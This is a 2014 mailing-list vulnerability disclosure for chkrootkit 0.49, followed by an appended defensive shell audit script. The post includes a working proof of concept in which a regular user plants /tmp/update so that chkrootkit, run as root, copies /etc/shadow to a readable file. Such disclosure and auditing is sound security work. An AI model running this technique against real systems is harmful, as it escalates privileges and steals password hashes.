[Slackbuilds-users] chkrootkit vulnerability

mancha mancha1 at hush.com
Thu Jun 5 06:27:35 UTC 2014


Hi.

As ironic as it sounds, chkrootkit 0.49 can be turned into a rootkit.

On systems where /tmp is not mounted noexec, a regular user can create a
file /tmp/update which chkrootkit will execute with root privileges each
time it's run.

Here's a simple PoC...as normal user: 

$ echo -e '#!/bin/bash\ncat /etc/shadow > /tmp/stolen' > /tmp/update
$ chmod 755 /tmp/update

As root:

# chkrootkit

Now the user has access to the shadow password file (/tmp/stolen).

Solution: Update to chkrootkit 0.50

--mancha

-----------------
PGP: 0x25168EB24F0B22AC
[56B7 100E F4D5 811C 8FEF  ADD1 2516 8EB2 4F0B 22AC]
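
The conditions named in the message above can be audited before chkrootkit is next run as root. This is an added example, not part of the original post: the function names are hypothetical, the checks take paths as parameters so they can be run against constructed sample data, and treating every version older than 0.50 as needing the update is an assumption (the post names only 0.49).

```shell
#!/bin/sh
# Added audit sketch (not from the post). All function names are hypothetical.

# Print the mount options of the filesystem holding directory $2, read from
# a /proc/mounts-style file $1. The longest matching mount point wins.
mount_opts_for() {
    awk -v dir="$2" '
        { mp = $2
          if (mp == "/" || dir == mp || index(dir, mp "/") == 1)
              if (length(mp) >= best) { best = length(mp); opts = $4 } }
        END { print opts }' "$1"
}

# Succeed if the filesystem holding $2 is mounted noexec.
is_noexec() {
    case ",$(mount_opts_for "$1" "$2")," in
        *,noexec,*) return 0 ;;
        *) return 1 ;;
    esac
}

# Succeed if version $1 sorts before 0.50, the release the post says to
# update to (assumption: anything older than 0.50 should be updated).
needs_update() {
    [ "$1" != "0.50" ] &&
    [ "$(printf '%s\n' "$1" 0.50 | sort -V | head -n 1)" = "$1" ]
}

# Succeed if $1 exists and is executable: the file 0.49 would run as root.
planted_update() {
    [ -f "$1" ] && [ -x "$1" ]
}

# usage: audit <mounts-file> <tmp-dir> <chkrootkit-version>
# Returns 0 when nothing was flagged, 1 otherwise.
audit() {
    rc=0
    is_noexec "$1" "$2" || { echo "WARN: $2 is not mounted noexec"; rc=1; }
    needs_update "$3" && { echo "WARN: chkrootkit $3 predates 0.50"; rc=1; }
    planted_update "$2/update" && {
        echo "ALERT: executable $2/update, owner uid $(stat -c %u "$2/update")"
        rc=1
    }
    return $rc
}
```

On a live host, call `audit /proc/mounts /tmp <installed version>` and investigate any ALERT line before running chkrootkit.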
